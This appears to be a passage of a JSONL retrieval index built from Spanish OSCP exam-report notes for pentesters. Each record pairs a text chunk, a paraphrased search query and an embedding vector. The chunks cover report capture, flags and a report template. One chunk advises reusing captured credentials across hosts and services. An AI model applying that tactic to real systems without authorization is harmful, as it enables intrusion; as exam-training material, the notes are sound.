"licencia": null, "texto": "## Reglas de oro\n- **Reutiliza credenciales** siempre: una pass de un user suele valer en otros hosts y servicios.\n- **1.5h sin progreso = cambia de mΓ‘quina** (ver GestiΓ³n del tiempo).\n- Captura todo mientras lo haces, no al final.\n\nRelacionado: Estructura del examen Β· Reglas de herramientas Β· OSCP MOC", "indexar": "cuΓ‘l es la mejor herramienta para capturar todo lo que hago mientras trabajo", "v": [0.08595, 0.10639, -0.1079, -0.01109, 0.07, -0.16921, 0.02263, 0.07963, -0.04785, -0.08692, -0.13988, -0.04717, -0.0165, 0.05712, 0.05413, 0.09959, 0.04585, -0.02269, -0.05124, 0.01556, -0.06682, 0.06299, -0.04509, -0.07035, -0.04518, -0.17149, 0.07411, 0.05854, -0.27563, 0.05383, 0.0222, 0.07574, 0.04977, -0.08548, -0.02274, -0.08442, -0.04709, 0.06475, -0.06691, 0.04952, 3e-05, 0.11808, -0.14718, 0.0242, 0.02383, -0.02055, 0.04365, -0.0456, -0.0521, 0.12232, -0.00396, -0.04191, -0.04475, -0.1114, -0.08794, -0.0764, 0.12662, -0.02586, 0.05638, -0.09997, -0.03177, 0.08579, -0.08578, -0.04683, 0.03885, -0.03784, 0.0035, -0.06044, -0.06205, 0.05104, 0.0239, 0.04739, -0.01517, 0.0019, 0.02207, 0.04831, -0.03842, 0.05598, 0.02405, -0.06785, 0.04126, -0.05519, -0.07885, 0.02174, -0.09126, -0.01336, 0.08432, -0.08279, -0.03786, -0.1503, 0.00323, 0.03974, -0.01825, -0.02383, -0.01425, 0.01032, 0.00889, -0.03268, -0.01997, 0.03116, 0.15661, -0.10792, -0.11093, -0.00971, -0.03889, 0.05384, -0.04357, 0.03215, -0.11856, -0.03932, -0.03616, 0.0419, -0.01688, 0.08277, -0.05991, 0.00624, -0.05725, -0.09125, -0.01227, -0.13027, 0.02889, 0.07025, -0.06734, -0.07517, 0.09955, -0.02259, 0.0036, 0.05787, 0.0465, -0.06822, -0.06542, 0.01074, -0.10003, 0.05323, 0.0052, -0.02753, 0.14631, -0.07262, -0.02679, -0.11823, -0.06437, -0.02548, 0.01013, -0.11734, 0.06471, 0.08248, 0.0537, 0.02538, -0.04095, -0.02897, 0.03044, -0.05709, 0.05849, -0.02098, -0.05013, 0.0555, -0.00222, -0.01206, -0.02832, 0.04824, 0.06005, -0.04717, 0.00257, 0.01193, -0.00195, -0.06861, -0.0078, -0.04842, 0.06361, -0.00657, 0.05961, -0.02557, 0.01497, -0.10311, 0.04574, -0.10074, 0.02373, 0.02122, 0.06101, -0.0841, -0.0642, 0.11474, 0.0098, -0.02231, 0.04328, -0.03659, 0.09384, -0.00411, -0.04361, 0.07037, -0.01102, -0.03506, 0.01891, -0.03413, 0.04268, -0.08218, 0.01883, -0.02308, 0.06508, 0.01515, -0.0178, -0.11377, -0.05308, -0.0397, 0.04608, 0.0298, -0.06984, 0.01556, -0.02207, -0.00031, 0.02093, -0.00969, 0.02413, -0.0836, 0.00043, -0.00772, 0.04032, -0.00078, -0.05199, -0.00357, 0.06949, 0.03033, 0.03894, 0.01672, -0.06664, 0.02845, 0.00584, 0.03392, -0.01325, -0.02113, 0.06837, 0.00786, -0.02795, -0.02978, -0.01839, 0.00189, 0.0177, -0.03823, -0.05927, -0.06609, 0.05048, 0.04238, -0.0472, -0.03095, -0.06019, 0.01581, -0.02767, 0.03853, -0.00614, -0.10486, -0.04283, 0.01534, 0.06884, -0.00565, 0.0273, -0.0324]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## QuΓ© necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarΓ‘s al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada mΓ‘quina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusiΓ³n leyendo el reporte.", "indexar": "quΓ© herramienta me sirve para capturar comandos en vivo junto con las configuraciones de red?", "v": [0.07465, 0.08108, -0.22904, -0.14218, 0.12236, -0.13851, 0.00532, 0.00107, -0.03121, -0.13399, -0.1064, -0.11884, 0.00122, -0.11798, 0.10122, 0.10138, 0.14093, 0.00624, 0.01399, -0.00067, 0.03014, -0.05585, -0.02403, -0.03873, -0.00298, 0.01653, 0.16579, -0.0289, -0.17171, -0.03936, 0.03857, 0.08298, 0.04339, -0.0107, -0.07568, -0.02372, -0.06598, 0.06758, -0.09016, 0.11702, -0.04782, 0.00501, -0.10949, 0.03098, 0.01758, -0.06995, 0.0386, -0.04016, -0.00676, 0.04225, 0.02364, -0.0634, -0.1269, -0.06829, -0.10903, -0.08486, 0.18311, -0.128, 0.06472, -0.07848, -0.0606, -0.03143, -0.02485, 0.06831, -0.02193, -0.04242, -0.07153, -0.10133, -0.04339, 0.10171, -0.00489, 0.0829, -0.03496, 0.0557, 0.06434, 0.03751, -0.01857, -0.02667, 0.17925, -0.00619, -0.02306, -0.01128, -0.15861, 0.01011, -0.05605, -0.03901, 0.05189, -0.03964, -0.0207, -0.12164, 0.05941, -0.02072, 0.07695, -0.00615, 0.09143, 0.0138, 0.01726, 0.00547, 0.04276, -0.01272, 0.07904, -0.0314, -0.18518, 0.05116, -0.03082, 0.05895, 0.00393, -0.10272, -0.01775, 0.04466, 0.00473, -0.03706, 0.0235, 0.01394, -0.02446, -0.01889, 0.01484, -0.06315, 0.03315, -0.07141, -0.06267, 0.05579, 0.01024, -0.03326, 0.01566, 0.02223, -0.08615, 0.06399, 0.0729, -0.03168, -0.05201, -0.02738, 0.04453, -0.04413, -0.0328, 0.03402, 0.06968, -0.0446, -0.11569, -0.14428, -0.01356, 0.04781, -0.05475, -0.12131, 0.04432, 0.04934, 0.01485, -0.02595, -0.04086, 0.05353, 0.05488, -0.02028, -0.03791, -0.01825, -0.03843, 0.02935, -0.03733, -0.01067, -0.10634, 0.02242, -0.04983, -0.06337, -0.0064, -0.02187, -0.00211, -0.09846, -0.01783, -0.03514, 0.05564, 0.02719, 0.02892, -0.04348, 0.00013, -0.10253, -0.01731, -0.08452, -0.02957, -0.03217, 0.04356, -0.11289, -0.0367, 0.06301, -0.00277, -0.02126, -0.0042, -0.06083, -0.00371, -0.00817, -0.02398, -0.00685, 0.00636, 0.04292, -0.00182, -0.03067, 0.04066, -0.00758, 0.03027, -0.02537, 0.00919, -0.02649, -0.02749, -0.00536, -0.00222, -0.065, 0.06725, 0.05901, -0.07144, 0.06358, 0.01867, 0.04665, -0.01444, 0.03047, 0.07137, -0.02514, -0.04082, -0.0373, 0.09382, 0.03267, -0.00283, -0.0101, 0.06834, 0.00163, 0.0397, 0.0345, -0.0057, -0.0035, -0.00989, -0.02594, 0.0501, -0.02483, 0.01793, -0.0301, -0.02579, -0.01282, -0.02349, -0.02693, 0.04123, 0.03674, -0.06799, -0.0404, 0.02661, 0.06463, -0.04838, -0.05972, 0.01882, -0.03557, -0.04966, -0.00568, 0.00779, -0.0907, -0.0232, 0.04448, 0.02583, -0.05157, -0.02218, -0.01735]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## QuΓ© necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarΓ‘s al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada mΓ‘quina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusiΓ³n leyendo el reporte.", "indexar": "con quΓ© programa puedo grabar archivos locales especΓ­ficos desde diferentes usuarios y privilegios de sistema?", "v": [0.09934, 0.08774, -0.05617, -0.15416, 0.01125, -0.09138, 0.12168, -0.1004, -0.12796, -0.10753, 0.01306, -0.04463, 0.00441, -0.053, 0.1031, 0.01667, 0.00465, -0.08194, -0.01103, 0.0619, -0.06117, 0.00536, 0.02422, -0.04192, -0.0525, -0.10717, 0.07747, -0.08456, -0.08598, 0.10416, 0.01843, 0.0769, -0.03834, -0.1469, -0.08476, -0.01757, 0.09909, 0.0185, -0.10694, 0.02355, 0.08931, 0.00135, -0.09591, -0.00327, 0.09655, -0.05258, -0.02708, 0.00018, -0.03693, -0.11397, -0.02165, -0.05114, -0.00794, -0.05004, 0.04827, -0.10616, -0.00247, -0.11734, 0.00858, 0.05229, -0.02817, 0.05348, 0.01081, 0.01736, 0.11247, -0.01772, 0.08798, -0.00633, -0.13896, 0.06898, -0.06142, 0.04196, 0.10542, 0.02282, 0.06641, 0.07515, -0.03954, -0.09022, -0.01115, -0.07739, 0.00356, -0.03864, 0.0049, 0.06021, -0.07982, 0.01254, 0.0171, -0.01477, -0.046, -0.0361, 0.14086, 0.00444, 0.07551, 0.02846, 0.08746, -0.0865, 0.17529, 0.10109, -0.00762, 0.0356, 0.04059, -0.04304, -0.05671, 0.21835, 0.04843, 0.08372, 0.06811, -0.04805, 0.04757, -0.03603, -0.00287, 0.06776, -0.00358, 0.00749, -0.10755, 0.00519, 0.01203, -0.05357, 0.06501, -0.00823, -0.05783, 0.03829, -0.02191, -0.12466, 0.11506, -0.03261, -0.04139, 0.10696, -0.03905, 0.15153, 0.01729, 0.0545, 0.00862, -0.00085, -0.05347, -0.03519, 0.03986, 0.04828, -0.02551, -0.02171, 0.01137, 0.02632, 0.03464, -0.02698, 0.12137, -0.03318, 0.027, -0.09501, -0.0735, -0.03711, -0.05874, 0.00355, -0.10796, -0.07437, -0.09515, 0.0293, 0.02914, -0.13864, -0.05372, 0.01819, -0.00678, -0.01487, -0.04576, -0.02735, 0.0451, -0.04477, -0.05035, -0.00072, 0.0374, 0.02357, 0.0157, 0.0671, 0.05511, -0.0718, -0.04023, -0.0214, -0.00607, -0.08492, 0.09709, -0.05451, -0.13862, 0.09964, 0.06021, 0.05005, -0.01841, 0.00182, -0.01031, 0.02733, 0.05657, 0.06645, 0.03173, 0.03723, 0.01274, 0.01729, -0.04637, -0.04605, -0.08656, 0.01892, -0.02512, 0.02978, -0.07813, -0.00704, -0.00135, -0.03316, 0.04463, 0.06523, -0.05498, -0.02279, 0.05738, 0.03605, -0.00085, 0.00351, 0.04886, 0.00514, -0.02132, -0.01287, 0.02705, -0.00028, 0.0222, -0.01802, 0.03163, -0.00576, 0.08918, 0.06504, 0.00723, -0.028, 0.01113, 0.01441, 0.00753, 0.01413, -0.03343, -0.02166, -0.06655, -0.05381, 0.02984, 0.00086, -0.00235, -0.02508, -0.04553, -0.08428, 0.02187, 0.13972, -0.01625, -0.03526, -0.0395, -0.05278, -0.07788, 0.02302, 0.04809, -0.05699, 0.00225, 0.06032, 0.05418, -0.0206, 0.01833, 0.02557]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## QuΓ© necesitas capturar EN VIVO\n- Cada comando exacto (no lo recordarΓ‘s al final).\n- Cada flag con el **hostname visible** en la misma captura (`ipconfig`/`ifconfig`).\n- `local.txt` (user) y `proof.txt` (root/SYSTEM) de cada mΓ‘quina.\n- Pasos reproducibles: alguien debe poder repetir tu intrusiΓ³n leyendo el reporte.", "indexar": "necesito una tΓ©cnica para documentar pasos reproducibles que incluyan la captura directa del hostname visible.", "v": [0.12892, -0.02886, -0.27011, -0.24008, 0.12249, -0.08889, -0.01898, 0.01992, -0.00809, 0.00392, -0.03369, -0.09051, -0.04576, -0.0221, 0.04511, -0.06297, 0.07236, -0.00649, 0.05314, -0.03538, -0.05756, -0.04884, -0.05276, -0.0057, 0.02443, -0.09608, 0.0018, -0.00852, -0.08231, -0.05571, 0.05865, 0.05294, -0.09593, 0.02876, -0.11702, -0.07015, -0.07196, -0.09416, -0.0722, 0.04174, -0.07569, 0.00092, -0.11643, 0.11838, -0.07896, 0.00894, -0.00943, -0.06428, -0.06878, -0.08092, 0.05469, 0.08571, -0.19455, -0.0348, -0.05205, -0.11085, 0.05531, -0.06519, 0.00386, -0.01152, -0.01531, -0.00304, 0.03395, 0.05316, 0.01646, -0.06198, 0.00828, -0.00347, -0.07721, 0.02769, -0.00458, 0.04878, 0.05429, 0.03002, 0.02184, -0.00421, 0.00798, -0.08011, -0.00516, -0.00058, -0.00443, -0.09947, 0.03044, -0.00097, -0.1033, 0.01728, 0.04122, 0.01898, 0.04297, -0.18504, 0.10357, 0.04653, 0.04012, -0.0038, 0.12233, -0.03147, 0.06688, 0.07831, -0.10166, 0.03087, -0.04588, 0.01265, -0.04064, 0.11538, 0.12855, 0.13445, 0.05825, -0.04292, -0.13119, -0.00051, -0.02814, 0.07091, -0.1252, -0.02713, -0.0548, -0.03095, -0.07126, -0.06155, 0.02117, 0.00464, -0.00299, -0.0052, -0.02348, -0.09042, 0.02015, -0.07559, -0.10725, -0.08348, 0.05743, -0.01433, 0.03134, 0.04839, -0.02272, -0.02242, -0.01331, -0.00405, 0.05661, -0.07307, 0.01688, -0.12307, 0.03991, -0.04526, -0.06409, 0.00431, 0.06513, 0.02303, -0.02328, -0.08058, -0.0282, 0.03141, 0.01909, -0.01709, -0.02251, 0.02971, -0.02776, 0.03771, 0.06301, -0.06006, -0.10025, 0.03912, 0.0099, -0.04335, -0.02553, -0.10658, 0.04617, -0.03211, -0.0361, -0.01619, 0.01454, -0.05428, -0.00644, 0.01438, -0.06572, -0.08015, 0.02153, -0.00963, 0.01707, -0.12085, 0.02091, -0.08524, 0.05, 0.0506, 0.07019, 0.01792, 0.03744, 0.0195, -0.01074, -0.01191, -0.0114, 0.11021, 0.06647, -0.03366, -0.08639, 0.03323, -0.01713, -0.04774, -0.05451, 0.01534, 0.06158, -0.00655, -0.04898, -0.00763, 0.02926, -0.02911, 0.04096, -0.04277, -0.09812, 0.01632, -0.03517, 0.01047, -0.06999, 0.01679, 0.0686, -0.03369, -0.08862, -0.03478, 0.01441, -0.00605, -0.05537, 0.0187, 0.09083, 0.01793, 0.03859, 0.05212, 0.029, -0.02611, 0.09476, 0.01797, 0.02774, -0.05307, -0.0539, 0.03929, -0.04413, -0.00066, 0.05595, 0.04761, -0.00821, -0.06602, -0.05263, -0.01022, 0.05235, 0.06738, -0.05243, 0.02234, 0.02886, -0.02161, -0.07154, 0.04515, 0.04821, -0.07361, 0.00089, 0.03887, 0.04084, -0.06761, 0.01542, -0.03358]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n β†’ https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "indexar": "cual es una herramienta para generar reportes de exΓ‘menes OSCP en formato markdown?", "v": [0.02001, -0.01261, 0.02359, -0.21151, 0.04061, -0.16375, -0.07851, 0.03207, -0.01497, -0.10735, -0.14589, -0.07715, -0.09465, -0.08276, 0.04456, 0.10578, 0.12136, -0.02325, -0.02517, 0.02755, -0.08098, -0.05259, -0.14927, -0.03648, -0.00235, 0.08999, -0.08581, -0.0133, -0.11738, 0.00888, 0.04278, 0.05254, 0.00474, -0.1008, -0.07817, -0.0112, -0.00471, -0.03064, -0.08075, 0.21642, -0.01927, 0.0444, -0.10011, 0.01816, 0.10131, -0.06682, 0.02292, 0.17451, -0.02326, -0.07601, -0.01315, -0.16468, -0.14387, -0.00817, -0.06567, -0.11438, 0.1689, -0.10095, 0.07098, -0.04981, -0.02458, 0.00577, -0.04335, -0.14355, 0.09345, -0.03878, -0.0123, -0.0004, -0.1028, 0.08842, 0.03459, 0.01103, 0.04163, -0.03747, -0.00647, -0.02803, -0.04092, 0.01055, 0.08769, -0.00609, -0.00351, -0.05655, -0.07046, 0.12022, -0.10199, -0.08555, 0.01961, 0.01309, -0.09101, -0.08568, 0.00612, 0.04387, 0.00416, 0.04863, -0.02132, -0.12713, 0.03302, -0.06369, -0.04956, -0.03839, 0.03158, -0.00541, -0.08098, 0.03327, -0.12743, 0.02343, -0.02134, 0.01089, -0.02753, 0.0957, 0.05875, 0.13368, 0.0, 0.06872, -0.0672, -0.04085, 0.03278, -0.00912, -0.01601, -0.02402, 0.01683, 0.1333, -0.0731, 0.03328, -0.01249, 0.03212, 0.04077, -0.03143, 0.05269, -0.03533, 0.06629, 0.02092, -0.08718, -0.02193, -0.05977, -0.08506, -0.01616, -0.06637, 0.00103, -0.09224, 0.02703, 0.05558, 0.06752, -0.05909, 0.00795, -0.02783, -0.04952, -0.04369, -0.11735, -0.0055, 0.01635, -0.07593, -0.01464, 0.00939, -0.04458, -0.02575, -0.06352, 0.00917, -0.02736, 0.02224, -0.09125, -0.07359, 0.04374, -0.00377, -0.01493, -0.02589, 0.03285, 0.02096, 0.0505, -0.02572, 0.02817, -0.04789, 0.07451, -0.07668, 0.07287, -0.06566, -0.03713, -0.05314, -0.04561, -0.07333, -0.02597, 0.02148, -0.01306, 0.04579, -0.00096, 0.00709, 0.05, 0.00089, 0.05422, -0.02932, -0.00845, 0.05537, -0.03083, -0.11069, 0.06678, 0.00105, 0.02053, -0.06595, 0.03867, -0.00179, -0.08216, -0.06307, -0.02155, -0.056, 0.03298, 0.04254, -0.02025, 0.04255, 0.03084, 0.01, -0.03509, -0.0022, 0.00012, -0.02041, -0.02468, 0.02013, 0.03389, 0.06854, -0.04079, -0.04213, 0.01471, -0.01642, 0.05606, -0.03967, -0.0442, 0.05854, 0.04395, -0.03876, -0.02432, -0.03227, 0.04982, -0.00689, 0.0414, -0.0065, 0.07183, -0.02523, 0.00778, 0.00919, -0.01655, -0.07575, 0.00777, 0.02571, 0.03648, -0.05432, -0.08675, 0.0169, 0.00296, -0.00018, 0.00762, -0.05823, 0.00733, 0.00513, 0.05489, -0.03554, -0.043, -0.03194]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n β†’ https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "indexar": "que programa puedo usar para crear un informe estructurado de mi examen OSCP?", "v": [-0.14582, 0.0134, -0.17833, -0.25909, 0.09733, -0.18652, -0.02349, -0.00136, -0.23991, -0.12646, -0.15735, -0.03205, -0.05718, -0.07623, -0.0296, -0.0357, 0.10606, -0.05788, 0.01327, -0.02692, -0.04786, -0.03625, -0.06131, 0.13997, -0.02853, 0.06498, -0.07483, -0.06177, 0.02443, -0.0797, -0.01031, 0.18186, 0.06585, -0.05427, -0.00438, 0.00825, -0.01092, -0.09709, -0.06919, 0.16011, -0.00417, 0.02493, 0.00619, 0.10729, 0.127, 0.02154, 0.08157, 0.10478, -0.03968, -0.02006, -0.02814, -0.08045, -0.11695, -0.01548, -0.02434, -0.0803, 0.04727, -0.13474, 0.07076, 0.01766, 0.03134, -0.00805, 0.05021, -0.06198, 0.07318, -0.05774, 0.01401, 0.06121, -0.06746, 0.06818, -0.02909, 0.04168, -0.00542, -0.01411, -0.01905, -0.01868, -0.03589, -0.05369, 0.07552, -0.01768, -0.00079, -0.00773, -0.05355, 0.09048, -0.16108, -0.09202, 0.03459, -0.00781, -0.00371, -0.0394, -0.00066, 0.03473, 0.0284, 0.06736, 0.07213, -0.0547, 0.03886, 0.03028, 0.03461, 0.02143, 0.00745, 0.02256, -0.01421, 0.07055, -0.09239, 0.08876, 0.07785, 0.00976, 0.00816, 0.00627, 0.00568, 0.04204, -0.08041, -0.04348, -0.08309, -0.03969, 0.02374, 0.05987, 0.00845, -0.08717, 0.04568, 0.12622, -0.04602, 0.03914, -0.01366, 0.01726, 0.05844, 0.12238, -0.02486, 0.11574, 0.02058, 0.01135, -0.10002, -0.03445, -0.09199, -0.10732, -0.06292, -0.04981, 0.0182, -0.00208, 0.0146, 0.10296, 0.00407, -0.00207, -0.02681, -0.00369, -0.07278, -0.05934, -0.01149, 0.01369, -0.02295, -0.00129, -0.0101, -0.00152, -0.09632, -0.01231, 0.05723, -0.03065, -0.00066, 0.06501, -0.0645, -0.00015, -0.03659, -0.00486, 0.09944, -0.01603, -0.04117, -0.01737, 0.0215, 0.01058, -0.01895, 0.01994, 0.04914, -0.07992, 0.09018, -0.02542, -0.01196, -0.01196, -0.08384, 0.00165, -0.07095, 0.0312, 0.0007, 0.02369, 0.02303, -0.00396, 0.01578, 0.0229, 0.00853, 0.02184, 0.00408, 0.05022, 0.05472, 0.00667, 0.01529, -0.02256, 0.01925, -0.0768, 0.0743, -0.03753, -0.05178, -0.02321, -0.02652, -0.05337, 0.03756, 0.02871, -0.00066, 0.06074, 0.05347, 0.10663, 0.02082, -0.04522, 0.04284, -0.03609, 0.00492, 0.06002, 0.05099, 0.09357, 0.01378, -0.02986, -0.01206, 0.02743, 0.02284, 0.05942, -0.00125, -0.05062, 0.00981, -0.00785, 0.04968, 0.02325, 0.01505, -0.04019, 0.06027, -0.03659, 0.04118, -0.0144, -0.01707, -0.01172, -0.0212, -0.05418, 0.01294, 0.0949, -0.00332, -0.05348, -0.01899, 0.02593, -0.01784, -0.00382, -0.0288, -0.07381, -0.00807, 0.00168, 0.0671, -0.05049, 0.01313, 0.07508]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Plantilla\n- Markdown: `noraj/OSCP-Exam-Report-Template-Markdown`\n β†’ https://github.com/noraj/OSCP-Exam-Report-Template-Markdown", "indexar": "con que genero los informes finales del examen OSCP", "v": [-0.07381, -0.042, -0.05383, -0.13462, 0.17684, -0.15611, 0.05117, 0.0115, -0.1136, -0.08673, -0.05641, 0.06383, -0.11073, -0.01719, 0.11954, 0.06349, 0.06427, 0.07532, -0.0226, 0.00013, -0.05814, -0.04334, 0.01107, 0.0503, 0.06542, -0.01625, -0.08416, -0.03406, 0.0745, -0.037, 0.01448, 0.07381, 0.0013, -0.1071, -0.01158, 0.01863, -0.10797, -0.02952, -0.11591, 0.18721, 0.02893, -0.11309, -0.04514, 0.03943, 0.17024, -0.0628, -0.08852, 0.21349, 0.09864, -0.07511, -0.03509, -0.07713, -0.08493, -0.02979, -0.11655, -0.09364, 0.0357, 0.04125, 0.05787, -0.0948, 0.04957, 0.00127, 0.04991, -0.05627, 0.05898, 0.00315, -0.02299, 0.03803, -0.0281, -0.01002, -0.0399, 0.0618, 0.06697, 0.02384, -0.04748, -0.10402, -0.09474, 0.05278, 0.09647, -0.04001, 0.00915, -0.06055, -0.06813, 0.11905, -0.11881, -0.1341, 0.04866, -0.02144, -0.00403, -0.06252, 0.07789, 0.05829, -0.00022, 0.08446, 0.02135, -0.05707, 0.06366, -0.01957, -0.00578, -0.04202, 0.02503, 0.08823, 0.01537, -0.00299, -0.07529, 0.12253, 0.09392, -0.01451, 0.09612, 0.01735, -0.02099, 0.09657, 0.03513, -0.00967, -0.00661, -0.07762, 0.00339, -0.01205, 0.00737, -0.06945, 0.04671, 0.0187, 0.04858, 0.08777, -0.04949, -0.03455, 0.0234, 0.03238, 0.07646, 0.00715, 0.03183, 0.05006, -0.15322, 0.03407, -0.05968, -0.08303, -0.07847, -0.0266, 0.0783, -0.01344, 0.02157, 0.09453, 0.0567, -0.00147, 0.04385, -0.00228, -0.05592, -0.02286, -0.02718, -0.03101, 0.0043, -0.02892, -0.01115, 0.01558, -0.11842, -0.01988, -0.03155, -0.01776, 0.0702, 0.09329, -0.05483, -0.08759, 0.0069, -0.0183, 0.02871, -0.00876, -0.0656, -0.02445, 0.02477, -0.01666, -0.01442, -0.05012, -0.06367, -0.04157, 0.08928, -0.06451, -0.00448, 0.02481, -0.00307, -0.00083, -0.08426, 0.05348, -0.08131, -0.00148, -0.01292, 0.03824, 0.02112, -0.02547, 0.08798, 0.08448, 0.05955, 0.04991, 0.04808, 0.0466, 0.03282, -0.00758, -0.02291, -0.05147, 0.07304, 0.02111, -0.07435, -0.02967, -0.01165, -0.08444, 0.05156, 0.02611, 0.00987, 0.11937, 0.00158, 0.01902, -0.00515, -0.06428, 0.01822, -0.02768, -0.04064, 0.01991, 0.05643, 0.0373, -0.05108, 0.03187, 0.04131, 0.045, 0.03391, -0.04663, 0.00485, 0.01615, 0.03295, -0.03574, 0.03787, 0.0149, -0.00361, 0.05806, 0.01492, 0.0161, 0.09803, 0.03121, 0.02639, 0.00306, -0.00852, -0.08273, 0.02557, 0.06581, 0.02421, -0.06032, -0.04606, -0.02943, -0.04213, -0.0158, 0.06596, -0.13081, 0.02538, 0.00278, 0.05643, -0.08313, -0.01473, -0.02265]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente mΓ‘quina (MetodologΓ­a OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen Β· GestiΓ³n del tiempo Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "que programa hay para documentar antes de pasar a la siguiente mΓ‘quina en un examen OSCP?", "v": [-0.06652, -0.02701, -0.00697, -0.24354, -0.08017, -0.1735, 0.00594, 0.04342, -0.10671, -0.04935, -0.05307, 0.0295, -0.04297, -0.06745, -0.05186, 0.00623, 0.12176, 0.00263, 0.06936, 0.00486, -0.05889, -0.00933, -0.01323, 0.05826, 0.08102, 0.07087, -0.06584, -0.04224, -0.08691, -0.10156, 0.04857, 0.11227, 0.02123, -0.10686, 0.00249, -0.04504, -0.00421, -0.13023, 0.00943, 0.09585, -0.00627, -0.01838, 0.00443, 0.15418, 0.11467, -0.00088, 0.08568, 0.07737, -0.00556, -0.15134, -0.00843, -0.02683, -0.00584, 0.09634, 0.01834, -0.14693, -0.07345, -0.06581, 0.08353, -0.07059, 0.02577, 0.06702, -0.081, -0.07503, 0.06016, -0.01081, 0.05842, 0.02206, -0.07199, 0.00859, -0.07789, 0.04788, -0.01734, 0.00657, -0.06452, -0.09747, -0.00845, -0.04509, 0.09387, -0.03441, 0.01949, -0.07421, 0.07225, 0.09724, -0.12517, -0.03042, 0.06486, 0.02761, 0.00729, -0.10275, 0.00532, 0.16441, 0.03857, 0.06921, 0.20715, -0.07083, 0.14157, -0.00338, -0.04817, 0.01616, 0.0439, 0.00764, -0.02021, 0.05993, -0.10818, 0.13305, 0.09865, 0.00136, -0.06332, 0.0263, 0.01926, 0.03275, -0.10621, -0.02684, -0.08801, -0.02037, 0.03634, -0.00234, -0.04758, -0.01691, 0.01024, 0.09409, -0.0395, -0.0791, 0.07202, 0.0207, 0.01516, 0.10621, 0.00431, 0.0563, 0.10145, 0.06555, -0.06751, 0.00099, -0.03502, -0.09169, -0.00511, -0.10238, -0.00272, -0.13028, 0.03055, 0.05336, 0.00021, -0.00048, 0.04459, -0.00093, -0.07093, -0.06915, -0.04863, 0.02412, -0.04023, -0.0494, 0.03777, 0.02345, -0.03069, 0.02408, 0.0637, -0.01455, -0.03312, 0.04744, -0.03863, -0.06387, -0.08513, -0.07385, 0.06563, 0.05833, -0.05442, 0.01499, 0.00232, -0.02706, 0.03127, -0.03849, 0.04323, -0.01327, 0.05516, -0.00474, 0.02812, -0.06844, 0.0232, -0.03788, -0.05852, 0.08947, 0.09106, 0.01017, 0.00487, -0.00493, -0.03515, 0.01712, 0.0782, 0.01932, 0.06438, 0.00614, -0.01041, -0.0193, 0.02292, -0.01339, -0.00652, 0.00192, 0.08951, 0.00845, -0.10508, -0.04836, -0.06041, -0.00155, 0.02946, 0.09416, -0.02998, 0.02269, 0.0028, 0.06218, -0.05974, 0.00676, 0.03642, -0.03154, -0.03535, 0.01003, 0.06601, 0.12177, -0.04064, 0.00843, 0.0643, -0.00091, 0.01399, 0.05576, -0.02682, -0.03989, 0.08536, 0.02598, 0.03083, -0.02672, -0.03259, -0.00872, 0.01948, -0.01275, 0.05472, 0.05193, 0.00152, -0.02023, -0.02898, -0.08993, 0.00379, 0.05494, -0.00801, -0.03929, -0.04076, 0.05666, -0.01243, -0.02235, 0.02675, -0.05063, 0.02653, -0.01788, 0.0268, -0.036, 0.02103, 0.04844]} -{"tipo": "pregunta", "herramienta": "Reporte OSCP", "perfil": "PENTESTERS", "fichero": "conocimiento/00 - Metodologia/Reporte OSCP.md", "tema": "metodologia", "fuente": null, "licencia": null, "texto": "## Flujo recomendado\n1. Documenta **antes** de pasar a la siguiente mΓ‘quina (MetodologΓ­a OSCP).\n2. Una carpeta por host con capturas + comandos.\n3. Al acabar, montas el reporte sobre esas notas.\n\nRelacionado: Estructura del examen Β· GestiΓ³n del tiempo Β· Recursos pΓΊblicos Β· OSCP MOC", "indexar": "con que puedo organizar capturas y comandos por host para montar un reporte?", "v": [0.2291, 0.15802, -0.18886, -0.19476, -0.04887, -0.05948, 0.13811, 0.09473, -0.10221, -0.11031, -0.13994, -0.04887, 0.10042, 0.00232, 0.00917, 0.09096, 0.12538, 0.07957, -0.0543, -0.01188, -0.03522, 0.00345, 0.04945, 0.02681, 0.06188, -0.05207, 0.13875, -0.00465, -0.16311, -0.13953, 0.00145, 0.03918, 0.01552, 0.07739, 0.00395, -0.08975, -0.03768, -0.04424, -0.07539, 0.07585, -0.08812, -0.01767, -0.15986, 0.01132, 0.03014, 